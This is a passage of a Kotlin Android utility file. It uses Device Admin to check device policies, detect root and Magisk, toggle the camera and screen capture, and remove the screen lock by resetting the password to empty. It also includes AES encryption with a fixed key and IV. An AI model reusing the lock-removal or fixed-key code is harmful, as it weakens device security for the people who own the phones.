   463тЖТ   463тЖТ   463тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   464тЖТ   464тЖТ   464тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   465тЖТ   465тЖТ   465тЖТ            val isAdmin = dpm.isAdminActive(adminComponent)
   466тЖТ   466тЖТ   466тЖТ            
   467тЖТ   467тЖТ   467тЖТ            val policies = mutableListOf<String>()
   468тЖТ   468тЖТ   468тЖТ            if (isAdmin) {
   469тЖТ   469тЖТ   469тЖТ                if (dpm.getPasswordQuality(adminComponent) != DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
   470тЖТ   470тЖТ   470тЖТ                    policies.add("password_quality")
   471тЖТ   471тЖТ   471тЖТ                }
   472тЖТ   472тЖТ   472тЖТ                if (dpm.getPasswordMinimumLength(adminComponent) > 0) {
   473тЖТ   473тЖТ   473тЖТ                    policies.add("password_minimum_length")
   474тЖТ   474тЖТ   474тЖТ                }
   475тЖТ   475тЖТ   475тЖТ                if (dpm.getMaximumFailedPasswordsForWipe(adminComponent) > 0) {
   476тЖТ   476тЖТ   476тЖТ                    policies.add("maximum_failed_passwords")
   477тЖТ   477тЖТ   477тЖТ                }
   478тЖТ   478тЖТ   478тЖТ                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
   479тЖТ   479тЖТ   479тЖТ                    if (dpm.isDeviceOwnerApp(context.packageName)) {
   480тЖТ   480тЖТ   480тЖТ                        policies.add("device_owner")
   481тЖТ   481тЖТ   481тЖТ                    }
   482тЖТ   482тЖТ   482тЖТ                    if (dpm.isProfileOwnerApp(context.packageName)) {
   483тЖТ   483тЖТ   483тЖТ                        policies.add("profile_owner")
   484тЖТ   484тЖТ   484тЖТ                    }
   485тЖТ   485тЖТ   485тЖТ                }
   486тЖТ   486тЖТ   486тЖТ            }
   487тЖТ   487тЖТ   487тЖТ            
   488тЖТ   488тЖТ   488тЖТ            mapOf(
   489тЖТ   489тЖТ   489тЖТ                "is_device_admin" to isAdmin,
   490тЖТ   490тЖТ   490тЖТ                "active_admins" to (dpm.activeAdmins?.size ?: 0),
   491тЖТ   491тЖТ   491тЖТ                "is_device_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isDeviceOwnerApp(context.packageName) else false,
   492тЖТ   492тЖТ   492тЖТ                "is_profile_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isProfileOwnerApp(context.packageName) else false,
   493тЖТ   493тЖТ   493тЖТ                "policies" to policies,
   494тЖТ   494тЖТ   494тЖТ                "device_owner_name" to try { @Suppress("DEPRECATION") (java.lang.reflect.Method::class.java.getDeclaredMethod("getDeviceOwnerName")).let { m -> m.invoke(dpm)?.toString() ?: "" } } catch (e: Exception) { "" }
   495тЖТ   495тЖТ   495тЖТ            )
   496тЖТ   496тЖТ   496тЖТ        } catch (e: Exception) {
   497тЖТ   497тЖТ   497тЖТ            Log.e(TAG, "Device admin status error", e)
   498тЖТ   498тЖТ   498тЖТ            mapOf("error" to (e.message ?: ""))
   499тЖТ   499тЖТ   499тЖТ        }
   500тЖТ   500тЖТ   500тЖТ    }
   501тЖТ   501тЖТ   501тЖТ
   502тЖТ   502тЖТ   502тЖТ    // ===== CHECK ROOT =====
   503тЖТ   503тЖТ   503тЖТ    fun checkRoot(): Map<String, Any> {
   504тЖТ   504тЖТ   504тЖТ        val rootPaths = arrayOf(
   505тЖТ   505тЖТ   505тЖТ            "/system/bin/su",
   506тЖТ   506тЖТ   506тЖТ            "/system/xbin/su",
   507тЖТ   507тЖТ   507тЖТ            "/sbin/su",
   508тЖТ   508тЖТ   508тЖТ            "/system/bin/failsafe/su",
   509тЖТ   509тЖТ   509тЖТ            "/data/local/xbin/su",
   510тЖТ   510тЖТ   510тЖТ            "/data/local/bin/su",
   511тЖТ   511тЖТ   511тЖТ            "/system/sd/xbin/su",
   512тЖТ   512тЖТ   512тЖТ            "/system/bin/curl",
   513тЖТ   513тЖТ   513тЖТ            "/system/bin/wget",
   514тЖТ   514тЖТ   514тЖТ            "/data/local/su",
   515тЖТ   515тЖТ   515тЖТ            "/su/bin/su",
   516тЖТ   516тЖТ   516тЖТ            "/magisk/.core/bin/su",
   517тЖТ   517тЖТ   517тЖТ            "/apex/com.android.runtime/bin/su"
   518тЖТ   518тЖТ   518тЖТ        )
   519тЖТ   519тЖТ   519тЖТ        
   520тЖТ   520тЖТ   520тЖТ        var hasRoot = false
   521тЖТ   521тЖТ   521тЖТ        val foundPaths = mutableListOf<String>()
   522тЖТ   522тЖТ   522тЖТ        
   523тЖТ   523тЖТ   523тЖТ        for (path in rootPaths) {
   524тЖТ   524тЖТ   524тЖТ            val file = File(path)
   525тЖТ   525тЖТ   525тЖТ            if (file.exists()) {
   526тЖТ   526тЖТ   526тЖТ                hasRoot = true
   527тЖТ   527тЖТ   527тЖТ                foundPaths.add(path)
   528тЖТ   528тЖТ   528тЖТ            }
   529тЖТ   529тЖТ   529тЖТ        }
   530тЖТ   530тЖТ   530тЖТ        
   531тЖТ   531тЖТ   531тЖТ        // Also check for root management apps
   532тЖТ   532тЖТ   532тЖТ        val rootApps = arrayOf(
   533тЖТ   533тЖТ   533тЖТ            "com.koushikdutta.superuser",
   534тЖТ   534тЖТ   534тЖТ            "com.thirdparty.superuser",
   535тЖТ   535тЖТ   535тЖТ            "eu.chainfire.supersu",
   536тЖТ   536тЖТ   536тЖТ            "com.noshufou.android.su",
   537тЖТ   537тЖТ   537тЖТ            "com.topjohnwu.magisk"
   538тЖТ   538тЖТ   538тЖТ        )
   539тЖТ   539тЖТ   539тЖТ        
   540тЖТ   540тЖТ   540тЖТ        return mapOf(
   541тЖТ   541тЖТ   541тЖТ            "rooted" to hasRoot,
   542тЖТ   542тЖТ   542тЖТ            "found_paths" to foundPaths,
   543тЖТ   543тЖТ   543тЖТ            "message" to if (hasRoot) "Device is rooted" else "Device is not rooted"
   544тЖТ   544тЖТ   544тЖТ        )
   545тЖТ   545тЖТ   545тЖТ    }
   546тЖТ   546тЖТ   546тЖТ    
   547тЖТ   547тЖТ   547тЖТ    fun checkMagisk(): Map<String, Any> {
   548тЖТ   548тЖТ   548тЖТ        val magiskPaths = arrayOf(
   549тЖТ   549тЖТ   549тЖТ            "/sbin/.magisk",
   550тЖТ   550тЖТ   550тЖТ            "/cache/.magisk",
   551тЖТ   551тЖТ   551тЖТ            "/data/adb/magisk",
   552тЖТ   552тЖТ   552тЖТ            "/data/adb/ksu",
   553тЖТ   553тЖТ   553тЖТ            "/data/adb/ap"
   554тЖТ   554тЖТ   554тЖТ        )
   555тЖТ   555тЖТ   555тЖТ        
   556тЖТ   556тЖТ   556тЖТ        var hasMagisk = false
   557тЖТ   557тЖТ   557тЖТ        val foundPaths = mutableListOf<String>()
   558тЖТ   558тЖТ   558тЖТ        
   559тЖТ   559тЖТ   559тЖТ        for (path in magiskPaths) {
   560тЖТ   560тЖТ   560тЖТ            if (File(path).exists()) {
   561тЖТ   561тЖТ   561тЖТ                hasMagisk = true
   562тЖТ   562тЖТ   562тЖТ                foundPaths.add(path)
   563тЖТ   563тЖТ   563тЖТ            }
   564тЖТ   564тЖТ   564тЖТ        }
   565тЖТ   565тЖТ   565тЖТ        
   566тЖТ   566тЖТ   566тЖТ        return mapOf(
   567тЖТ   567тЖТ   567тЖТ            "has_magisk" to hasMagisk,
   568тЖТ   568тЖТ   568тЖТ            "found_paths" to foundPaths
   569тЖТ   569тЖТ   569тЖТ        )
   570тЖТ   570тЖТ   570тЖТ    }
   571тЖТ   571тЖТ   571тЖТ
   572тЖТ   572тЖТ   572тЖТ    // ===== SCREEN LOCK =====
   573тЖТ   573тЖТ   573тЖТ    fun setScreenLock(context: Context): String {
   574тЖТ   574тЖТ   574тЖТ        return try {
   575тЖТ   575тЖТ   575тЖТ            val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   576тЖТ   576тЖТ   576тЖТ            if (km.isDeviceSecure) {
   577тЖТ   577тЖТ   577тЖТ                return "Screen lock is already configured (device is secure)"
   578тЖТ   578тЖТ   578тЖТ            }
   579тЖТ   579тЖТ   579тЖТ            // Open lock screen settings to let user set up a lock
   580тЖТ   580тЖТ   580тЖТ            val intent = Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   581тЖТ   581тЖТ   581тЖТ                addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   582тЖТ   582тЖТ   582тЖТ            }
   583тЖТ   583тЖТ   583тЖТ            context.startActivity(intent)
   584тЖТ   584тЖТ   584тЖТ            "Opening security settings to set screen lock"
   585тЖТ   585тЖТ   585тЖТ        } catch (e: Exception) {
   586тЖТ   586тЖТ   586тЖТ            Log.e(TAG, "Set screen lock error", e)
   587тЖТ   587тЖТ   587тЖТ            "Error: ${e.message}"
   588тЖТ   588тЖТ   588тЖТ        }
   589тЖТ   589тЖТ   589тЖТ    }
   590тЖТ   590тЖТ   590тЖТ
   591тЖТ   591тЖТ   591тЖТ    fun removeScreenLock(context: Context): String {
   592тЖТ   592тЖТ   592тЖТ        return try {
   593тЖТ   593тЖТ   593тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   594тЖТ   594тЖТ   594тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   595тЖТ   595тЖТ   595тЖТ
   596тЖТ   596тЖТ   596тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   597тЖТ   597тЖТ   597тЖТ                // Try opening settings directly for lock screen removal
   598тЖТ   598тЖТ   598тЖТ                val intent = Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   599тЖТ   599тЖТ   599тЖТ                    addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   600тЖТ   600тЖТ   600тЖТ                }
   601тЖТ   601тЖТ   601тЖТ                context.startActivity(intent)
   602тЖТ   602тЖТ   602тЖТ                return "Opening security settings - Device Admin not active. Remove lock manually or activate Device Admin first."
   603тЖТ   603тЖТ   603тЖТ            }
   604тЖТ   604тЖТ   604тЖТ
   605тЖТ   605тЖТ   605тЖТ            // Reset password to empty to remove screen lock
   606тЖТ   606тЖТ   606тЖТ            val result = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   607тЖТ   607тЖТ   607тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   608тЖТ   608тЖТ   608тЖТ            } else {
   609тЖТ   609тЖТ   609тЖТ                @Suppress("DEPRECATION")
   610тЖТ   610тЖТ   610тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   611тЖТ   611тЖТ   611тЖТ            }
   612тЖТ   612тЖТ   612тЖТ
   613тЖТ   613тЖТ   613тЖТ            if (result) {
   614тЖТ   614тЖТ   614тЖТ                dpm.lockNow()
   615тЖТ   615тЖТ   615тЖТ                "Screen lock removed (password reset to empty via Device Admin)"
   616тЖТ   616тЖТ   616тЖТ            } else {
   617тЖТ   617тЖТ   617тЖТ                "Failed to remove screen lock - device may have additional restrictions"
   618тЖТ   618тЖТ   618тЖТ            }
   619тЖТ   619тЖТ   619тЖТ        } catch (e: Exception) {
   620тЖТ   620тЖТ   620тЖТ            Log.e(TAG, "Remove screen lock error", e)
   621тЖТ   621тЖТ   621тЖТ            "Error: ${e.message}"
   622тЖТ   622тЖТ   622тЖТ        }
   623тЖТ   623тЖТ   623тЖТ    }
   624тЖТ   624тЖТ   624тЖТ    
   625тЖТ   625тЖТ   625тЖТ    fun isScreenLockEnabled(context: Context): Map<String, Any> {
   626тЖТ   626тЖТ   626тЖТ        return try {
   627тЖТ   627тЖТ   627тЖТ            val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   628тЖТ   628тЖТ   628тЖТ            val pm = context.getSystemService(Context.POWER_SERVICE) as PowerManager
   629тЖТ   629тЖТ   629тЖТ            
   630тЖТ   630тЖТ   630тЖТ            mapOf(
   631тЖТ   631тЖТ   631тЖТ                "is_secure" to km.isDeviceSecure,
   632тЖТ   632тЖТ   632тЖТ                "is_locked" to km.isKeyguardLocked,
   633тЖТ   633тЖТ   633тЖТ                "is_keyguard_showing" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP_MR1) km.isDeviceLocked else false,
   634тЖТ   634тЖТ   634тЖТ                "screen_on" to pm.isInteractive
   635тЖТ   635тЖТ   635тЖТ            )
   636тЖТ   636тЖТ   636тЖТ        } catch (e: Exception) {
   637тЖТ   637тЖТ   637тЖТ            mapOf("error" to (e.message ?: ""))
   638тЖТ   638тЖТ   638тЖТ        }
   639тЖТ   639тЖТ   639тЖТ    }
   640тЖТ   640тЖТ   640тЖТ
   641тЖТ   641тЖТ   641тЖТ    // ===== CAMERA DISABLE =====
   642тЖТ   642тЖТ   642тЖТ    fun disableCamera(context: Context): String {
   643тЖТ   643тЖТ   643тЖТ        return try {
   644тЖТ   644тЖТ   644тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   645тЖТ   645тЖТ   645тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   646тЖТ   646тЖТ   646тЖТ            
   647тЖТ   647тЖТ   647тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   648тЖТ   648тЖТ   648тЖТ                return "Device Admin not active"
   649тЖТ   649тЖТ   649тЖТ            }
   650тЖТ   650тЖТ   650тЖТ            
   651тЖТ   651тЖТ   651тЖТ            dpm.setCameraDisabled(adminComponent, true)
   652тЖТ   652тЖТ   652тЖТ            "Camera disabled"
   653тЖТ   653тЖТ   653тЖТ        } catch (e: Exception) {
   654тЖТ   654тЖТ   654тЖТ            Log.e(TAG, "Disable camera error", e)
   655тЖТ   655тЖТ   655тЖТ            "Error: ${e.message}"
   656тЖТ   656тЖТ   656тЖТ        }
   657тЖТ   657тЖТ   657тЖТ    }
   658тЖТ   658тЖТ   658тЖТ    
   659тЖТ   659тЖТ   659тЖТ    fun enableCamera(context: Context): String {
   660тЖТ   660тЖТ   660тЖТ        return try {
   661тЖТ   661тЖТ   661тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   662тЖТ   662тЖТ   662тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   663тЖТ   663тЖТ   663тЖТ            
   664тЖТ   664тЖТ   664тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   665тЖТ   665тЖТ   665тЖТ                return "Device Admin not active"
   666тЖТ   666тЖТ   666тЖТ            }
   667тЖТ   667тЖТ   667тЖТ            
   668тЖТ   668тЖТ   668тЖТ            dpm.setCameraDisabled(adminComponent, false)
   669тЖТ   669тЖТ   669тЖТ            "Camera enabled"
   670тЖТ   670тЖТ   670тЖТ        } catch (e: Exception) {
   671тЖТ   671тЖТ   671тЖТ            Log.e(TAG, "Enable camera error", e)
   672тЖТ   672тЖТ   672тЖТ            "Error: ${e.message}"
   673тЖТ   673тЖТ   673тЖТ        }
   674тЖТ   674тЖТ   674тЖТ    }
   675тЖТ   675тЖТ   675тЖТ    
   676тЖТ   676тЖТ   676тЖТ    fun isCameraDisabled(context: Context): Boolean {
   677тЖТ   677тЖТ   677тЖТ        return try {
   678тЖТ   678тЖТ   678тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   679тЖТ   679тЖТ   679тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   680тЖТ   680тЖТ   680тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.UPSIDE_DOWN_CAKE) {
   681тЖТ   681тЖТ   681тЖТ                @Suppress("DEPRECATION")
   682тЖТ   682тЖТ   682тЖТ                return dpm.getCameraDisabled(adminComponent)
   683тЖТ   683тЖТ   683тЖТ            } else {
   684тЖТ   684тЖТ   684тЖТ                @Suppress("DEPRECATION")
   685тЖТ   685тЖТ   685тЖТ                return dpm.getCameraDisabled(null)
   686тЖТ   686тЖТ   686тЖТ            }
   687тЖТ   687тЖТ   687тЖТ        } catch (e: Exception) {
   688тЖТ   688тЖТ   688тЖТ            Log.w(TAG, "isCameraDisabled error", e)
   689тЖТ   689тЖТ   689тЖТ            false
   690тЖТ   690тЖТ   690тЖТ        }
   691тЖТ   691тЖТ   691тЖТ    }
   692тЖТ   692тЖТ   692тЖТ
   693тЖТ   693тЖТ   693тЖТ    // ===== SCREEN CAPTURE =====
   694тЖТ   694тЖТ   694тЖТ    @Suppress("DEPRECATION")
   695тЖТ   695тЖТ   695тЖТ    fun disableScreenCapture(context: Context): String {
   696тЖТ   696тЖТ   696тЖТ        return try {
   697тЖТ   697тЖТ   697тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   698тЖТ   698тЖТ   698тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   699тЖТ   699тЖТ   699тЖТ            
   700тЖТ   700тЖТ   700тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   701тЖТ   701тЖТ   701тЖТ                return "Device Admin not active"
   702тЖТ   702тЖТ   702тЖТ            }
   703тЖТ   703тЖТ   703тЖТ            
   704тЖТ   704тЖТ   704тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   705тЖТ   705тЖТ   705тЖТ                dpm.setScreenCaptureDisabled(adminComponent, true)
   706тЖТ   706тЖТ   706тЖТ            } else {
   707тЖТ   707тЖТ   707тЖТ                // For older versions, use FLAG_SECURE in windows
   708тЖТ   708тЖТ   708тЖТ            }
   709тЖТ   709тЖТ   709тЖТ            
   710тЖТ   710тЖТ   710тЖТ            "Screen capture disabled"
   711тЖТ   711тЖТ   711тЖТ        } catch (e: Exception) {
   712тЖТ   712тЖТ   712тЖТ            Log.e(TAG, "Disable screen capture error", e)
   713тЖТ   713тЖТ   713тЖТ            "Error: ${e.message}"
   714тЖТ   714тЖТ   714тЖТ        }
   715тЖТ   715тЖТ   715тЖТ    }
   716тЖТ   716тЖТ   716тЖТ    
   717тЖТ   717тЖТ   717тЖТ    fun enableScreenCapture(context: Context): String {
   718тЖТ   718тЖТ   718тЖТ        return try {
   719тЖТ   719тЖТ   719тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   720тЖТ   720тЖТ   720тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   721тЖТ   721тЖТ   721тЖТ            
   722тЖТ   722тЖТ   722тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   723тЖТ   723тЖТ   723тЖТ                return "Device Admin not active"
   724тЖТ   724тЖТ   724тЖТ            }
   725тЖТ   725тЖТ   725тЖТ            
   726тЖТ   726тЖТ   726тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   727тЖТ   727тЖТ   727тЖТ                dpm.setScreenCaptureDisabled(adminComponent, false)
   728тЖТ   728тЖТ   728тЖТ            }
   729тЖТ   729тЖТ   729тЖТ            
   730тЖТ   730тЖТ   730тЖТ            "Screen capture enabled"
   731тЖТ   731тЖТ   731тЖТ        } catch (e: Exception) {
   732тЖТ   732тЖТ   732тЖТ            Log.e(TAG, "Enable screen capture error", e)
   733тЖТ   733тЖТ   733тЖТ            "Error: ${e.message}"
   734тЖТ   734тЖТ   734тЖТ        }
   735тЖТ   735тЖТ   735тЖТ    }
   736тЖТ   736тЖТ   736тЖТ
   737тЖТ   737тЖТ   737тЖТ    // ===== ENCRYPTION =====
   738тЖТ   738тЖТ   738тЖТ    fun encryptData(data: String): String? {
   739тЖТ   739тЖТ   739тЖТ        return try {
   740тЖТ   740тЖТ   740тЖТ            val keySpec = SecretKeySpec(AES_KEY.toByteArray(), "AES")
   741тЖТ   741тЖТ   741тЖТ            val ivSpec = IvParameterSpec(AES_IV.toByteArray())
   742тЖТ   742тЖТ   742тЖТ            
   743тЖТ   743тЖТ   743тЖТ            val cipher = Cipher.getInstance("AES/CBC/PKCS5Padding")
   744тЖТ   744тЖТ   744тЖТ            cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec)
   745тЖТ   745тЖТ   745тЖТ            
   746тЖТ   746тЖТ   746тЖТ            val encrypted = cipher.doFinal(data.toByteArray())
   747тЖТ   747тЖТ   747тЖТ            android.util.Base64.encodeToString(encrypted, android.util.Base64.DEFAULT)
   748тЖТ   748тЖТ   748тЖТ        } catch (e: Exception) {
   749тЖТ   749тЖТ   749тЖТ            Log.e(TAG, "Encrypt error", e)
   750тЖТ   750тЖТ   750тЖТ            null
   751тЖТ   751тЖТ   751тЖТ        }
   752тЖТ   752тЖТ   752тЖТ    }
   753тЖТ   753тЖТ   753тЖТ    
   754тЖТ   754тЖТ   754тЖТ    fun decryptData(encryptedData: String): String? {
   755тЖТ   755тЖТ   755тЖТ        return try {
   756тЖТ   756тЖТ   756тЖТ            val keySpec = SecretKeySpec(AES_KEY.toByteArray(), "AES")
   757тЖТ   757тЖТ   757тЖТ            val ivSpec = IvParameterSpec(AES_IV.toByteArray())
   758тЖТ   758тЖТ   758тЖТ            
   759тЖТ   759тЖТ   759тЖТ            val cipher = Cipher.getInstance("AES/CBC/PKCS5Padding")
   760тЖТ   760тЖТ   760тЖТ            cipher.init(Cipher.DECRYPT_MODE, keySpec, ivSpec)
   761тЖТ   761тЖТ   761тЖТ            
   762тЖТ   762тЖТ   762тЖТ            val decoded = android.util.Base64.decode(encryptedData, android.util.Base64.DEFAULT)
   763тЖТ   763тЖТ   763тЖТ            val decrypted = cipher.doFinal(decoded)
   764тЖТ   764тЖТ   764тЖТ            String(decrypted)
   765тЖТ   765тЖТ   765тЖТ        } catch (e: Exception) {
   766тЖТ   766тЖТ   766тЖТ            Log.e(TAG, "Decrypt error", e)
   767тЖТ   767тЖТ   767тЖТ            null
   768тЖТ   768тЖТ   768тЖТ        }
   769тЖТ   769тЖТ   769тЖТ    }
   770тЖТ   770тЖТ   770тЖТ    
   771тЖТ   771тЖТ   771тЖТ    fun sha256(input: String): String {
   772тЖТ   772тЖТ   772тЖТ        val md = MessageDigest.getInstance("SHA-256")
   773тЖТ   773тЖТ   773тЖТ        val digest = md.digest(input.toByteArray())
   774тЖТ   774тЖТ   774тЖТ        return digest.joinToString("") { "%02x".format(it) }
   775тЖТ   775тЖТ   775тЖТ    }
   776тЖТ   776тЖТ   776тЖТ
   777тЖТ   777тЖТ   777тЖТ    // ===== KEYGUARD =====
   778тЖТ   778тЖТ   778тЖТ    fun dismissKeyguard(context: Context): String {
   779тЖТ   779тЖТ   779тЖТ        return try {
   780тЖТ   780тЖТ   780тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   781тЖТ   781тЖТ   781тЖТ                val km = context.getSystemService(Context.KEYGUARD_SERVICE) as KeyguardManager
   782тЖТ   782тЖТ   782тЖТ                val activity = context as? Activity ?: return "error_not_activity"
   783тЖТ   783тЖТ   783тЖТ                km.requestDismissKeyguard(
   784тЖТ   784тЖТ   784тЖТ                    activity,
   785тЖТ   785тЖТ   785тЖТ                    object : KeyguardManager.KeyguardDismissCallback() {
   786тЖТ   786тЖТ   786тЖТ                        override fun onDismissSucceeded() {
   787тЖТ   787тЖТ   787тЖТ                            // Keyguard dismissed
   788тЖТ   788тЖТ   788тЖТ                        }
   789тЖТ   789тЖТ   789тЖТ                        override fun onDismissCancelled() {
   790тЖТ   790тЖТ   790тЖТ                            // Dismiss cancelled
   791тЖТ   791тЖТ   791тЖТ                        }
   792тЖТ   792тЖТ   792тЖТ                        override fun onDismissError() {
   793тЖТ   793тЖТ   793тЖТ                            // Dismiss error
   794тЖТ   794тЖТ   794тЖТ                        }
   795тЖТ   795тЖТ   795тЖТ                    }
   796тЖТ   796тЖТ   796тЖТ                )
   797тЖТ   797тЖТ   797тЖТ                "Requesting keyguard dismiss"
   798тЖТ   798тЖТ   798тЖТ            } else {
   799тЖТ   799тЖТ   799тЖТ                "Keyguard dismiss requires Android 8+"
   800тЖТ   800тЖТ   800тЖТ            }
   801тЖТ   801тЖТ   801тЖТ        } catch (e: Exception) {
   802тЖТ   802тЖТ   802тЖТ            "Error: ${e.message}"
   803тЖТ   803тЖТ   803тЖТ        }
   804тЖТ   804тЖТ   804тЖТ    }
   805тЖТ   805тЖТ   805тЖТ    
   806тЖТ   806тЖТ   806тЖТ    // ===== ENCRYPTION STATUS =====
   807тЖТ   807тЖТ   807тЖТ    fun getEncryptionStatus(context: Context): Map<String, Any> {
   808тЖТ   808тЖТ   808тЖТ        return try {
   809тЖТ   809тЖТ   809тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   810тЖТ   810тЖТ   810тЖТ            
   811тЖТ   811тЖТ   811тЖТ            mapOf(
   812тЖТ   812тЖТ   812тЖТ                "storage_encryption_status" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N) {
   813тЖТ   813тЖТ   813тЖТ                    when (dpm.storageEncryptionStatus) {
   814тЖТ   814тЖТ   814тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_INACTIVE -> "inactive"
   815тЖТ   815тЖТ   815тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE -> "active"
   816тЖТ   816тЖТ   816тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_UNSUPPORTED -> "unsupported"
   817тЖТ   817тЖТ   817тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVATING -> "activating"
   818тЖТ   818тЖТ   818тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE_DEFAULT_KEY -> "active_default_key"
   819тЖТ   819тЖТ   819тЖТ                        DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE_PER_USER -> "active_per_user"
   820тЖТ   820тЖТ   820тЖТ                        else -> "unknown"
   821тЖТ   821тЖТ   821тЖТ                    }
   822тЖТ   822тЖТ   822тЖТ                } else "unknown",
   823тЖТ   823тЖТ   823тЖТ                "is_encrypted" to (dpm.storageEncryptionStatus == DevicePolicyManager.ENCRYPTION_STATUS_ACTIVE)
   824тЖТ   824тЖТ   824тЖТ            )
   825тЖТ   825тЖТ   825тЖТ        } catch (e: Exception) {
   826тЖТ   826тЖТ   826тЖТ            mapOf("error" to (e.message ?: ""))
   827тЖТ   827тЖТ   827тЖТ        }
   828тЖТ   828тЖТ   828тЖТ    }
   829тЖТ   829тЖТ   829тЖТ}
   830тЖТ   830тЖТ   830тЖТ